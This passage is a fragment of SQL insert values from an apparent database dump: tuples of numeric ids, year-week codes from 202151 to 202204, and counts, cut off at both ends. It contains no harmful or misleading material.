,'202151',13),(2813,1,'202151',13),(3117,1,'202151',13),(3127,1,'202151',13),(74,1,'202151',14),(473,1,'202151',14),(1544,1,'202151',14),(1598,1,'202151',14),(3069,1,'202151',14),(3781,1,'202151',14),(4400,1,'202151',14),(4524,1,'202151',14),(91,1,'202151',15),(1606,1,'202151',15),(76,1,'202151',16),(1612,1,'202151',16),(1724,1,'202151',16),(108,1,'202151',17),(2309,1,'202151',17),(2457,1,'202151',17),(2503,1,'202151',17),(4326,1,'202151',17),(3764,1,'202151',19),(4238,1,'202151',19),(1602,1,'202151',20),(1594,1,'202151',21),(1600,1,'202151',21),(89,1,'202151',22),(68,1,'202151',24),(4529,1,'202151',24),(72,1,'202151',35),(1586,1,'202151',35),(87,1,'202151',39),(80,1,'202151',42),(2904,1,'202151',121),(9,1,'202151',650),(102,1,'202152',1),(106,1,'202152',1),(471,1,'202152',1),(478,1,'202152',1),(481,1,'202152',1),(1584,1,'202152',1),(1590,1,'202152',1),(1695,1,'202152',1),(1707,1,'202152',1),(1732,1,'202152',1),(1734,1,'202152',1),(1743,1,'202152',1),(1770,1,'202152',1),(1772,1,'202152',1),(2148,1,'202152',1),(2154,1,'202152',1),(2558,1,'202152',1),(2751,1,'202152',1),(2769,1,'202152',1),(2991,1,'202152',1),(3023,1,'202152',1),(3041,1,'202152',1),(3066,1,'202152',1),(3109,1,'202152',1),(3124,1,'202152',1),(3247,1,'202152',1),(3261,1,'202152',1),(3265,1,'202152',1),(3498,1,'202152',1),(3541,1,'202152',1),(3738,1,'202152',1),(3774,1,'202152',1),(4404,1,'202152',1),(4424,1,'202152',1),(110,1,'202152',2),(477,1,'202152',2),(480,1,'202152',2),(483,1,'202152',2),(484,1,'202152',2),(1709,1,'202152',2),(1715,1,'202152',2),(1720,1,'202152',2),(1741,1,'202152',2),(1745,1,'202152',2),(1747,1,'202152',2),(1782,1,'202152',2),(2063,1,'202152',2),(2150,1,'202152',2),(2161,1,'202152',2),(2252,1,'202152',2),(2617,1,'202152',2),(2775,1,'202152',2),(2801,1,'202152',2),(2804,1,'202152',2),(3004,1,'202152',2),(3027,1,'202152',2),(3030,1,'202152',2),(3083,1,'202152',2),(3097,1,'202152',2),(3102,1,'202152',2),(3117,1,'202152',2),(3245,1,'202152',2),(3251,1,'202152',2),(3257,1,'202152',2),(3259,1,'202152',2),(3263,1,'202152',2),(3280,1,'202152',2),(3287,1,'202152',2),(3297,1,'202152',2),(3714,1,'202152',2),(3721,1,'202152',2),(3731,1,'202152',2),(3749,1,'202152',2),(3771,1,'202152',2),(4275,1,'202152',2),(4332,1,'202152',2),(4357,1,'202152',2),(4363,1,'202152',2),(4373,1,'202152',2),(4400,1,'202152',2),(4408,1,'202152',2),(4428,1,'202152',2),(4436,1,'202152',2),(4514,1,'202152',2),(476,1,'202152',3),(479,1,'202152',3),(486,1,'202152',3),(1592,1,'202152',3),(1596,1,'202152',3),(1699,1,'202152',3),(1705,1,'202152',3),(1711,1,'202152',3),(1722,1,'202152',3),(1730,1,'202152',3),(1751,1,'202152',3),(1766,1,'202152',3),(1774,1,'202152',3),(1776,1,'202152',3),(1780,1,'202152',3),(2156,1,'202152',3),(2297,1,'202152',3),(2964,1,'202152',3),(2993,1,'202152',3),(3038,1,'202152',3),(3060,1,'202152',3),(3090,1,'202152',3),(3092,1,'202152',3),(3229,1,'202152',3),(3267,1,'202152',3),(3269,1,'202152',3),(3271,1,'202152',3),(3273,1,'202152',3),(3313,1,'202152',3),(3430,1,'202152',3),(3438,1,'202152',3),(3489,1,'202152',3),(3531,1,'202152',3),(3777,1,'202152',3),(4329,1,'202152',3),(4341,1,'202152',3),(4368,1,'202152',3),(4377,1,'202152',3),(4382,1,'202152',3),(4391,1,'202152',3),(4396,1,'202152',3),(4420,1,'202152',3),(4444,1,'202152',3),(4454,1,'202152',3),(74,1,'202152',4),(485,1,'202152',4),(488,1,'202152',4),(1544,1,'202152',4),(1703,1,'202152',4),(1713,1,'202152',4),(1718,1,'202152',4),(1724,1,'202152',4),(1726,1,'202152',4),(1728,1,'202152',4),(1768,1,'202152',4),(2159,1,'202152',4),(2178,1,'202152',4),(2748,1,'202152',4),(2965,1,'202152',4),(3006,1,'202152',4),(3045,1,'202152',4),(3096,1,'202152',4),(3107,1,'202152',4),(3243,1,'202152',4),(3253,1,'202152',4),(3290,1,'202152',4),(3316,1,'202152',4),(3479,1,'202152',4),(3534,1,'202152',4),(3710,1,'202152',4),(3735,1,'202152',4),(3752,1,'202152',4),(4301,1,'202152',4),(4338,1,'202152',4),(4416,1,'202152',4),(4432,1,'202152',4),(4440,1,'202152',4),(4448,1,'202152',4),(468,1,'202152',5),(470,1,'202152',5),(482,1,'202152',5),(570,1,'202152',5),(1604,1,'202152',5),(1606,1,'202152',5),(1610,1,'202152',5),(1737,1,'202152',5),(1778,1,'202152',5),(2165,1,'202152',5),(2293,1,'202152',5),(2911,1,'202152',5),(3034,1,'202152',5),(3072,1,'202152',5),(3104,1,'202152',5),(3127,1,'202152',5),(3240,1,'202152',5),(3282,1,'202152',5),(3285,1,'202152',5),(3482,1,'202152',5),(3781,1,'202152',5),(4323,1,'202152',5),(4387,1,'202152',5),(4412,1,'202152',5),(472,1,'202152',6),(473,1,'202152',6),(1582,1,'202152',6),(1697,1,'202152',6),(2457,1,'202152',6),(4520,1,'202152',6),(467,1,'202152',7),(1612,1,'202152',7),(2989,1,'202152',7),(3063,1,'202152',7),(3226,1,'202152',7),(3486,1,'202152',7),(4326,1,'202152',7),(4517,1,'202152',7),(84,1,'202152',8),(474,1,'202152',8),(1614,1,'202152',8),(2609,1,'202152',8),(3005,1,'202152',8),(3087,1,'202152',8),(3764,1,'202152',8),(487,1,'202152',9),(1588,1,'202152',9),(1598,1,'202152',9),(2503,1,'202152',9),(2956,1,'202152',9),(3069,1,'202152',9),(3742,1,'202152',9),(4238,1,'202152',9),(4457,1,'202152',9),(4524,1,'202152',9),(469,1,'202152',10),(1608,1,'202152',10),(2658,1,'202152',10),(2809,1,'202152',10),(4335,1,'202152',10),(2704,1,'202152',11),(108,1,'202152',12),(335,1,'202152',12),(68,1,'202152',13),(76,1,'202152',13),(91,1,'202152',13),(1600,1,'202152',13),(2309,1,'202152',13),(4529,1,'202152',13),(87,1,'202152',17),(1602,1,'202152',17),(89,1,'202152',18),(2813,1,'202152',18),(1594,1,'202152',23),(1586,1,'202152',35),(80,1,'202152',37),(72,1,'202152',41),(2904,1,'202152',69),(9,1,'202152',567),(1699,1,'202201',1),(1713,1,'202201',1),(1722,1,'202201',1),(1726,1,'202201',1),(1734,1,'202201',1),(1739,1,'202201',1),(1747,1,'202201',1),(2178,1,'202201',1),(3023,1,'202201',1),(3104,1,'202201',1),(3240,1,'202201',1),(3249,1,'202201',1),(3257,1,'202201',1),(3273,1,'202201',1),(3489,1,'202201',1),(3541,1,'202201',1),(3727,1,'202201',1),(106,1,'202201',2),(1697,1,'202201',2),(1701,1,'202201',2),(1703,1,'202201',2),(1711,1,'202201',2),(1743,1,'202201',2),(1745,1,'202201',2),(1751,1,'202201',2),(1770,1,'202201',2),(1780,1,'202201',2),(1782,1,'202201',2),(2063,1,'202201',2),(2148,1,'202201',2),(2617,1,'202201',2),(2775,1,'202201',2),(2801,1,'202201',2),(2956,1,'202201',2),(2965,1,'202201',2),(2991,1,'202201',2),(3027,1,'202201',2),(3083,1,'202201',2),(3096,1,'202201',2),(3226,1,'202201',2),(3243,1,'202201',2),(3247,1,'202201',2),(3251,1,'202201',2),(3253,1,'202201',2),(3259,1,'202201',2),(3265,1,'202201',2),(3269,1,'202201',2),(3290,1,'202201',2),(3297,1,'202201',2),(3438,1,'202201',2),(3486,1,'202201',2),(3731,1,'202201',2),(3735,1,'202201',2),(3749,1,'202201',2),(4329,1,'202201',2),(4368,1,'202201',2),(4387,1,'202201',2),(102,1,'202201',3),(479,1,'202201',3),(480,1,'202201',3),(1584,1,'202201',3),(1749,1,'202201',3),(2150,1,'202201',3),(2152,1,'202201',3),(2156,1,'202201',3),(2658,1,'202201',3),(2751,1,'202201',3),(3030,1,'202201',3),(3034,1,'202201',3),(3041,1,'202201',3),(3066,1,'202201',3),(3079,1,'202201',3),(3090,1,'202201',3),(3092,1,'202201',3),(3097,1,'202201',3),(3102,1,'202201',3),(3109,1,'202201',3),(3261,1,'202201',3),(3263,1,'202201',3),(3267,1,'202201',3),(3275,1,'202201',3),(3278,1,'202201',3),(3313,1,'202201',3),(3316,1,'202201',3),(3479,1,'202201',3),(3721,1,'202201',3),(3738,1,'202201',3),(3746,1,'202201',3),(4275,1,'202201',3),(4341,1,'202201',3),(4357,1,'202201',3),(4363,1,'202201',3),(4373,1,'202201',3),(4377,1,'202201',3),(4382,1,'202201',3),(4404,1,'202201',3),(4408,1,'202201',3),(4412,1,'202201',3),(4416,1,'202201',3),(4420,1,'202201',3),(4428,1,'202201',3),(471,1,'202201',4),(476,1,'202201',4),(478,1,'202201',4),(485,1,'202201',4),(486,1,'202201',4),(1590,1,'202201',4),(1596,1,'202201',4),(1604,1,'202201',4),(1610,1,'202201',4),(1728,1,'202201',4),(1730,1,'202201',4),(1741,1,'202201',4),(1774,1,'202201',4),(2165,1,'202201',4),(2248,1,'202201',4),(2558,1,'202201',4),(3004,1,'202201',4),(3069,1,'202201',4),(3282,1,'202201',4),(3287,1,'202201',4),(3307,1,'202201',4),(3430,1,'202201',4),(3531,1,'202201',4),(3724,1,'202201',4),(3771,1,'202201',4),(3774,1,'202201',4),(4436,1,'202201',4),(483,1,'202201',5),(488,1,'202201',5),(570,1,'202201',5),(1720,1,'202201',5),(1732,1,'202201',5),(1772,1,'202201',5),(1778,1,'202201',5),(2252,1,'202201',5),(2609,1,'202201',5),(2809,1,'202201',5),(2993,1,'202201',5),(3038,1,'202201',5),(3063,1,'202201',5),(3107,1,'202201',5),(3271,1,'202201',5),(3285,1,'202201',5),(3534,1,'202201',5),(3714,1,'202201',5),(3777,1,'202201',5),(4338,1,'202201',5),(4391,1,'202201',5),(4440,1,'202201',5),(4542,1,'202201',5),(477,1,'202201',6),(481,1,'202201',6),(482,1,'202201',6),(484,1,'202201',6),(1766,1,'202201',6),(2161,1,'202201',6),(2293,1,'202201',6),(2748,1,'202201',6),(2769,1,'202201',6),(2911,1,'202201',6),(2964,1,'202201',6),(3124,1,'202201',6),(3229,1,'202201',6),(3280,1,'202201',6),(3742,1,'202201',6),(3752,1,'202201',6),(4323,1,'202201',6),(4396,1,'202201',6),(4424,1,'202201',6),(4432,1,'202201',6),(4444,1,'202201',6),(472,1,'202201',7),(473,1,'202201',7),(474,1,'202201',7),(1709,1,'202201',7),(2296,1,'202201',7),(2804,1,'202201',7),(3006,1,'202201',7),(3117,1,'202201',7),(3498,1,'202201',7),(4332,1,'202201',7),(4335,1,'202201',7),(4514,1,'202201',7),(4520,1,'202201',7),(1592,1,'202201',8),(1695,1,'202201',8),(1724,1,'202201',8),(1768,1,'202201',8),(2154,1,'202201',8),(2704,1,'202201',8),(2813,1,'202201',8),(2989,1,'202201',8),(3127,1,'202201',8),(3245,1,'202201',8),(4400,1,'202201',8),(4448,1,'202201',8),(4454,1,'202201',8),(2457,1,'202201',9),(3045,1,'202201',9),(3060,1,'202201',9),(3087,1,'202201',9),(4301,1,'202201',9),(4326,1,'202201',9),(470,1,'202201',10),(487,1,'202201',10),(1614,1,'202201',10),(1776,1,'202201',10),(3005,1,'202201',10),(3072,1,'202201',10),(3710,1,'202201',10),(84,1,'202201',11),(467,1,'202201',11),(1718,1,'202201',11),(4238,1,'202201',11),(4517,1,'202201',11),(4524,1,'202201',11),(74,1,'202201',12),(3764,1,'202201',12),(335,1,'202201',13),(468,1,'202201',13),(1598,1,'202201',13),(2159,1,'202201',13),(2309,1,'202201',14),(4457,1,'202201',14),(1544,1,'202201',15),(1612,1,'202201',15),(2503,1,'202201',15),(469,1,'202201',16),(1588,1,'202201',16),(3482,1,'202201',16),(1582,1,'202201',17),(4529,1,'202201',17),(3781,1,'202201',18),(1600,1,'202201',19),(2297,1,'202201',19),(76,1,'202201',20),(87,1,'202201',21),(1606,1,'202201',22),(1608,1,'202201',22),(68,1,'202201',25),(89,1,'202201',25),(91,1,'202201',25),(108,1,'202201',26),(1602,1,'202201',27),(1715,1,'202201',32),(1594,1,'202201',34),(1586,1,'202201',37),(80,1,'202201',52),(72,1,'202201',53),(2904,1,'202201',101),(9,1,'202201',676),(106,1,'202202',2),(478,1,'202202',2),(1703,1,'202202',2),(1730,1,'202202',2),(2150,1,'202202',2),(2248,1,'202202',2),(2993,1,'202202',2),(3092,1,'202202',2),(3287,1,'202202',2),(481,1,'202202',3),(483,1,'202202',3),(484,1,'202202',3),(488,1,'202202',3),(1743,1,'202202',3),(1749,1,'202202',3),(1782,1,'202202',3),(2063,1,'202202',3),(2165,1,'202202',3),(2178,1,'202202',3),(2252,1,'202202',3),(2296,1,'202202',3),(3006,1,'202202',3),(3041,1,'202202',3),(3096,1,'202202',3),(3109,1,'202202',3),(3229,1,'202202',3),(3240,1,'202202',3),(3247,1,'202202',3),(3263,1,'202202',3),(3265,1,'202202',3),(3269,1,'202202',3),(3271,1,'202202',3),(3275,1,'202202',3),(3486,1,'202202',3),(3534,1,'202202',3),(3738,1,'202202',3),(4363,1,'202202',3),(4368,1,'202202',3),(4373,1,'202202',3),(4377,1,'202202',3),(4408,1,'202202',3),(102,1,'202202',4),(471,1,'202202',4),(476,1,'202202',4),(479,1,'202202',4),(480,1,'202202',4),(485,1,'202202',4),(1584,1,'202202',4),(1707,1,'202202',4),(1711,1,'202202',4),(1713,1,'202202',4),(1726,1,'202202',4),(1732,1,'202202',4),(1739,1,'202202',4),(1747,1,'202202',4),(1751,1,'202202',4),(1774,1,'202202',4),(1780,1,'202202',4),(2161,1,'202202',4),(2751,1,'202202',4),(2991,1,'202202',4),(3097,1,'202202',4),(3243,1,'202202',4),(3249,1,'202202',4),(3251,1,'202202',4),(3253,1,'202202',4),(3257,1,'202202',4),(3259,1,'202202',4),(3261,1,'202202',4),(3267,1,'202202',4),(3273,1,'202202',4),(3278,1,'202202',4),(3290,1,'202202',4),(3541,1,'202202',4),(3714,1,'202202',4),(3735,1,'202202',4),(3774,1,'202202',4),(4323,1,'202202',4),(4357,1,'202202',4),(4382,1,'202202',4),(4396,1,'202202',4),(4416,1,'202202',4),(4424,1,'202202',4),(4428,1,'202202',4),(4432,1,'202202',4),(4444,1,'202202',4),(467,1,'202202',5),(482,1,'202202',5),(1590,1,'202202',5),(1697,1,'202202',5),(1701,1,'202202',5),(1705,1,'202202',5),(1709,1,'202202',5),(1734,1,'202202',5),(1737,1,'202202',5),(1741,1,'202202',5),(1745,1,'202202',5),(1768,1,'202202',5),(1772,1,'202202',5),(2658,1,'202202',5),(2956,1,'202202',5),(3023,1,'202202',5),(3034,1,'202202',5),(3079,1,'202202',5),(3104,1,'202202',5),(3226,1,'202202',5),(3245,1,'202202',5),(3280,1,'202202',5),(3479,1,'202202',5),(3721,1,'202202',5),(3731,1,'202202',5),(4404,1,'202202',5),(4556,1,'202202',5),(473,1,'202202',6),(1695,1,'202202',6),(1699,1,'202202',6),(1722,1,'202202',6),(1770,1,'202202',6),(2156,1,'202202',6),(2609,1,'202202',6),(2617,1,'202202',6),(2801,1,'202202',6),(2965,1,'202202',6),(3005,1,'202202',6),(3066,1,'202202',6),(3117,1,'202202',6),(3124,1,'202202',6),(3297,1,'202202',6),(3307,1,'202202',6),(3724,1,'202202',6),(3727,1,'202202',6),(3752,1,'202202',6),(3777,1,'202202',6),(4301,1,'202202',6),(4329,1,'202202',6),(4387,1,'202202',6),(4440,1,'202202',6),(4448,1,'202202',6),(4546,1,'202202',6),(74,1,'202202',7),(474,1,'202202',7),(1720,1,'202202',7),(1728,1,'202202',7),(1766,1,'202202',7),(1778,1,'202202',7),(2154,1,'202202',7),(2558,1,'202202',7),(2911,1,'202202',7),(3004,1,'202202',7),(3027,1,'202202',7),(3038,1,'202202',7),(3102,1,'202202',7),(3282,1,'202202',7),(3313,1,'202202',7),(3430,1,'202202',7),(3498,1,'202202',7),(3531,1,'202202',7),(3710,1,'202202',7),(4341,1,'202202',7),(4420,1,'202202',7),(468,1,'202202',8),(477,1,'202202',8),(486,1,'202202',8),(1596,1,'202202',8),(1610,1,'202202',8),(1776,1,'202202',8),(2293,1,'202202',8),(2704,1,'202202',8),(2748,1,'202202',8),(2775,1,'202202',8),(2804,1,'202202',8),(3087,1,'202202',8),(3090,1,'202202',8),(3107,1,'202202',8),(3285,1,'202202',8),(3489,1,'202202',8),(3742,1,'202202',8),(3749,1,'202202',8),(3771,1,'202202',8),(4275,1,'202202',8),(4332,1,'202202',8),(4391,1,'202202',8),(4514,1,'202202',8),(2148,1,'202202',9),(2152,1,'202202',9),(2809,1,'202202',9),(2964,1,'202202',9),(2989,1,'202202',9),(3316,1,'202202',9),(4338,1,'202202',9),(4436,1,'202202',9),(1604,1,'202202',10),(3072,1,'202202',10),(3083,1,'202202',10),(3438,1,'202202',10),(4238,1,'202202',10),(4412,1,'202202',10),(487,1,'202202',11),(1724,1,'202202',11),(3063,1,'202202',11),(3069,1,'202202',11),(4517,1,'202202',11),(4524,1,'202202',11),(570,1,'202202',12),(2297,1,'202202',12),(2769,1,'202202',12),(3030,1,'202202',12),(3045,1,'202202',12),(3482,1,'202202',12),(4454,1,'202202',12),(335,1,'202202',13),(472,1,'202202',13),(1592,1,'202202',13),(4400,1,'202202',13),(4529,1,'202202',13),(1614,1,'202202',14),(3127,1,'202202',14),(4326,1,'202202',14),(1544,1,'202202',15),(2159,1,'202202',15),(2503,1,'202202',15),(3746,1,'202202',15),(3764,1,'202202',15),(4542,1,'202202',15),(4551,1,'202202',15),(87,1,'202202',16),(470,1,'202202',16),(1612,1,'202202',16),(1718,1,'202202',16),(3060,1,'202202',16),(4335,1,'202202',16),(4457,1,'202202',16),(4520,1,'202202',16),(2457,1,'202202',17),(2813,1,'202202',17),(84,1,'202202',18),(1606,1,'202202',18),(76,1,'202202',19),(1598,1,'202202',19),(3781,1,'202202',19),(469,1,'202202',21),(1588,1,'202202',22),(108,1,'202202',23),(2309,1,'202202',23),(1600,1,'202202',24),(91,1,'202202',25),(1715,1,'202202',28),(68,1,'202202',31),(1582,1,'202202',31),(1594,1,'202202',34),(1602,1,'202202',34),(1608,1,'202202',35),(89,1,'202202',39),(1586,1,'202202',39),(72,1,'202202',41),(80,1,'202202',70),(2904,1,'202202',91),(9,1,'202202',752),(1697,1,'202203',2),(1734,1,'202203',2),(2063,1,'202203',2),(2152,1,'202203',2),(2296,1,'202203',2),(2558,1,'202203',2),(2965,1,'202203',2),(3079,1,'202203',2),(3102,1,'202203',2),(3249,1,'202203',2),(106,1,'202203',3),(110,1,'202203',3),(1590,1,'202203',3),(1711,1,'202203',3),(1730,1,'202203',3),(1737,1,'202203',3),(2156,1,'202203',3),(3034,1,'202203',3),(3243,1,'202203',3),(3269,1,'202203',3),(3489,1,'202203',3),(3541,1,'202203',3),(3727,1,'202203',3),(3749,1,'202203',3),(4357,1,'202203',3),(4444,1,'202203',3),(479,1,'202203',4),(481,1,'202203',4),(485,1,'202203',4),(1701,1,'202203',4),(1715,1,'202203',4),(1720,1,'202203',4),(1749,1,'202203',4),(1751,1,'202203',4),(1778,1,'202203',4),(1780,1,'202203',4),(2252,1,'202203',4),(2293,1,'202203',4),(2964,1,'202203',4),(2993,1,'202203',4),(3004,1,'202203',4),(3066,1,'202203',4),(3069,1,'202203',4),(3092,1,'202203',4),(3096,1,'202203',4),(3107,1,'202203',4),(3109,1,'202203',4),(3127,1,'202203',4),(3226,1,'202203',4),(3240,1,'202203',4),(3253,1,'202203',4),(3257,1,'202203',4),(3271,1,'202203',4),(3287,1,'202203',4),(3498,1,'202203',4),(3531,1,'202203',4),(3724,1,'202203',4),(3738,1,'202203',4),(3742,1,'202203',4),(4428,1,'202203',4),(4436,1,'202203',4),(4440,1,'202203',4),(102,1,'202203',5),(1703,1,'202203',5),(1705,1,'202203',5),(1745,1,'202203',5),(1768,1,'202203',5),(1770,1,'202203',5),(1776,1,'202203',5),(1782,1,'202203',5),(2178,1,'202203',5),(2248,1,'202203',5),(3097,1,'202203',5),(3104,1,'202203',5),(3124,1,'202203',5),(3259,1,'202203',5),(3265,1,'202203',5),(3280,1,'202203',5),(3297,1,'202203',5),(3307,1,'202203',5),(3438,1,'202203',5),(3721,1,'202203',5),(3731,1,'202203',5),(3735,1,'202203',5),(3771,1,'202203',5),(3774,1,'202203',5),(3777,1,'202203',5),(4368,1,'202203',5),(4373,1,'202203',5),(4377,1,'202203',5),(4382,1,'202203',5),(4396,1,'202203',5),(4404,1,'202203',5),(4408,1,'202203',5),(4416,1,'202203',5),(4420,1,'202203',5),(4424,1,'202203',5),(4432,1,'202203',5),(471,1,'202203',6),(476,1,'202203',6),(482,1,'202203',6),(483,1,'202203',6),(488,1,'202203',6),(1610,1,'202203',6),(1699,1,'202203',6),(1707,1,'202203',6),(1726,1,'202203',6),(1732,1,'202203',6),(1741,1,'202203',6),(1743,1,'202203',6),(1747,1,'202203',6),(1774,1,'202203',6),(2154,1,'202203',6),(2161,1,'202203',6),(2775,1,'202203',6),(2911,1,'202203',6),(2956,1,'202203',6),(3027,1,'202203',6),(3041,1,'202203',6),(3087,1,'202203',6),(3229,1,'202203',6),(3245,1,'202203',6),(3247,1,'202203',6),(3261,1,'202203',6),(3275,1,'202203',6),(3278,1,'202203',6),(3313,1,'202203',6),(3316,1,'202203',6),(3430,1,'202203',6),(3714,1,'202203',6),(3752,1,'202203',6),(4341,1,'202203',6),(4363,1,'202203',6),(4387,1,'202203',6),(4514,1,'202203',6),(74,1,'202203',7),(478,1,'202203',7),(480,1,'202203',7),(484,1,'202203',7),(1713,1,'202203',7),(1718,1,'202203',7),(1722,1,'202203',7),(1724,1,'202203',7),(1772,1,'202203',7),(2148,1,'202203',7),(2150,1,'202203',7),(2801,1,'202203',7),(2989,1,'202203',7),(2991,1,'202203',7),(3006,1,'202203',7),(3023,1,'202203',7),(3038,1,'202203',7),(3060,1,'202203',7),(3251,1,'202203',7),(3290,1,'202203',7),(3486,1,'202203',7),(3534,1,'202203',7),(3710,1,'202203',7),(3746,1,'202203',7),(4275,1,'202203',7),(4329,1,'202203',7),(4412,1,'202203',7),(4517,1,'202203',7),(486,1,'202203',8),(1592,1,'202203',8),(2658,1,'202203',8),(2748,1,'202203',8),(2751,1,'202203',8),(2809,1,'202203',8),(3063,1,'202203',8),(3267,1,'202203',8),(3273,1,'202203',8),(3282,1,'202203',8),(3285,1,'202203',8),(3479,1,'202203',8),(4301,1,'202203',8),(4338,1,'202203',8),(4546,1,'202203',8),(468,1,'202203',9),(474,1,'202203',9),(570,1,'202203',9),(1695,1,'202203',9),(1709,1,'202203',9),(2165,1,'202203',9),(2704,1,'202203',9),(2769,1,'202203',9),(3072,1,'202203',9),(3090,1,'202203',9),(3263,1,'202203',9),(3764,1,'202203',9),(4326,1,'202203',9),(4542,1,'202203',9),(1584,1,'202203',10),(1596,1,'202203',10),(1728,1,'202203',10),(1739,1,'202203',10),(2297,1,'202203',10),(2457,1,'202203',10),(2609,1,'202203',10),(3083,1,'202203',10),(3482,1,'202203',10),(4391,1,'202203',10),(4448,1,'202203',10),(4457,1,'202203',10),(4556,1,'202203',10),(487,1,'202203',11),(1766,1,'202203',11),(2503,1,'202203',11),(2804,1,'202203',11),(3045,1,'202203',11),(3117,1,'202203',11),(4323,1,'202203',11),(4332,1,'202203',11),(4454,1,'202203',11),(4520,1,'202203',11),(4551,1,'202203',11),(467,1,'202203',12),(470,1,'202203',12),(473,1,'202203',12),(4400,1,'202203',12),(4529,1,'202203',12),(84,1,'202203',13),(335,1,'202203',13),(2813,1,'202203',13),(3030,1,'202203',13),(4238,1,'202203',13),(1588,1,'202203',14),(2159,1,'202203',14),(2617,1,'202203',14),(472,1,'202203',15),(477,1,'202203',15),(1614,1,'202203',15),(3781,1,'202203',15),(87,1,'202203',16),(1544,1,'202203',16),(1612,1,'202203',16),(4524,1,'202203',16),(469,1,'202203',17),(3005,1,'202203',17),(91,1,'202203',19),(1582,1,'202203',21),(1594,1,'202203',21),(1606,1,'202203',21),(1608,1,'202203',21),(2309,1,'202203',21),(1598,1,'202203',22),(76,1,'202203',23),(108,1,'202203',23),(1604,1,'202203',25),(4335,1,'202203',26),(1600,1,'202203',29),(89,1,'202203',30),(68,1,'202203',33),(72,1,'202203',34),(1586,1,'202203',38),(1602,1,'202203',41),(80,1,'202203',54),(2904,1,'202203',102),(9,1,'202203',702),(110,1,'202204',2),(476,1,'202204',2),(482,1,'202204',2),(486,1,'202204',2),(488,1,'202204',2),(1707,1,'202204',2),(1713,1,'202204',2),(3097,1,'202204',2),(4329,1,'202204',2),(4408,1,'202204',2),(102,1,'202204',3),(474,1,'202204',3),(479,1,'202204',3),(480,1,'202204',3),(481,1,'202204',3),(483,1,'202204',3),(484,1,'202204',3),(485,1,'202204',3),(1584,1,'202204',3),(1705,1,'202204',3),(1726,1,'202204',3),(1728,1,'202204',3),(1751,1,'202204',3),(1768,1,'202204',3),(1776,1,'202204',3),(1780,1,'202204',3),(2178,1,'202204',3),(2293,1,'202204',3),(2748,1,'202204',3),(2956,1,'202204',3),(3092,1,'202204',3),(3247,1,'202204',3),(3486,1,'202204',3),(3735,1,'202204',3),(3749,1,'202204',3),(4332,1,'202204',3),(4341,1,'202204',3),(471,1,'202204',4),(478,1,'202204',4),(1697,1,'202204',4),(1701,1,'202204',4),(1739,1,'202204',4),(1741,1,'202204',4),(1745,1,'202204',4),(1747,1,'202204',4),(1770,1,'202204',4),(1778,1,'202204',4),(2148,1,'202204',4),(2150,1,'202204',4),(2152,1,'202204',4),(2156,1,'202204',4),(2165,1,'202204',4),(2751,1,'202204',4),(2993,1,'202204',4),(3034,1,'202204',4),(3102,1,'202204',4),(3109,1,'202204',4),(3278,1,'202204',4),(3287,1,'202204',4),(3297,1,'202204',4),(3498,1,'202204',4),(3534,1,'202204',4),(3727,1,'202204',4),(3738,1,'202204',4),(3742,1,'202204',4),(3771,1,'202204',4),(4323,1,'202204',4),(4338,1,'202204',4),(4368,1,'202204',4),(4440,1,'202204',4),(1610,1,'202204',5),(1718,1,'202204',5),(1722,1,'202204',5),(1766,1,'202204',5),(1782,1,'202204',5),(2161,1,'202204',5),(2252,1,'202204',5),(2911,1,'202204',5),(2964,1,'202204',5),(2989,1,'202204',5),(3006,1,'202204',5),(3023,1,'202204',5),(3027,1,'202204',5),(3038,1,'202204',5),(3069,1,'202204',5),(3079,1,'202204',5),(3090,1,'202204',5),(3240,1,'202204',5),(3251,1,'202204',5),(3259,1,'202204',5),(3261,1,'202204',5),(3271,1,'202204',5),(3273,1,'202204',5),(3275,1,'202204',5),(3282,1,'202204',5),(3290,1,'202204',5),(3489,1,'202204',5),(3541,1,'202204',5),(3721,1,'202204',5),(3724,1,'202204',5),(3731,1,'202204',5),(3752,1,'202204',5),(3774,1,'202204',5),(3777,1,'202204',5),(4275,1,'202204',5),(4363,1,'202204',5),(4373,1,'202204',5),(4396,1,'202204',5),(4424,1,'202204',5),(472,1,'202204',6),(570,1,'202204',6),(1695,1,'202204',6),(1699,1,'202204',6),(1720,1,'202204',6),(1749,1,'202204',6),(1772,1,'202204',6),(1774,1,'202204',6),(2296,1,'202204',6),(2617,1,'202204',6),(3066,1,'202204',6),(3096,1,'202204',6),(3107,1,'202204',6),(3243,1,'202204',6),(3245,1,'202204',6),(3249,1,'202204',6),(3263,1,'202204',6),(3265,1,'202204',6),(3267,1,'202204',6),(3280,1,'202204',6),(3285,1,'202204',6),(3316,1,'202204',6),(3430,1,'202204',6),(3710,1,'202204',6),(4301,1,'202204',6),(4357,1,'202204',6),(4377,1,'202204',6),(4382,1,'202204',6),(4387,1,'202204',6),(4412,1,'202204',6),(4428,1,'202204',6),(4436,1,'202204',6),(4448,1,'202204',6),(4454,1,'202204',6),(4542,1,'202204',6),(4546,1,'202204',6),(469,1,'202204',7),(470,1,'202204',7),(477,1,'202204',7),(1590,1,'202204',7),(1711,1,'202204',7),(1715,1,'202204',7),(1724,1,'202204',7),(1732,1,'202204',7),(1734,1,'202204',7),(1737,1,'202204',7),(1743,1,'202204',7),(2063,1,'202204',7),(2154,1,'202204',7),(2457,1,'202204',7),(2704,1,'202204',7),(2775,1,'202204',7),(2804,1,'202204',7),(2991,1,'202204',7),(3030,1,'202204',7),(3063,1,'202204',7),(3083,1,'202204',7),(3104,1,'202204',7),(3229,1,'202204',7),(3253,1,'202204',7),(3269,1,'202204',7),(3313,1,'202204',7),(3438,1,'202204',7),(3714,1,'202204',7),(4326,1,'202204',7),(4556,1,'202204',7),(74,1,'202204',8),(467,1,'202204',8),(473,1,'202204',8),(1592,1,'202204',8),(1703,1,'202204',8),(1730,1,'202204',8),(2609,1,'202204',8),(2658,1,'202204',8),(2813,1,'202204',8),(3045,1,'202204',8),(3257,1,'202204',8),(3479,1,'202204',8),(3531,1,'202204',8),(3781,1,'202204',8),(4420,1,'202204',8),(4444,1,'202204',8),(4514,1,'202204',8),(1604,1,'202204',9),(1614,1,'202204',9),(1709,1,'202204',9),(2248,1,'202204',9),(2558,1,'202204',9),(2769,1,'202204',9),(2965,1,'202204',9),(3041,1,'202204',9),(3226,1,'202204',9),(3307,1,'202204',9),(3482,1,'202204',9),(4416,1,'202204',9),(4432,1,'202204',9),(4517,1,'202204',9),(4529,1,'202204',9),(4551,1,'202204',9),(1612,1,'202204',10),(2159,1,'202204',10),(2801,1,'202204',10),(3124,1,'202204',10),(3127,1,'202204',10),(4404,1,'202204',10),(3072,1,'202204',11),(3117,1,'202204',11),(4238,1,'202204',11),(4400,1,'202204',11),(4520,1,'202204',11),(84,1,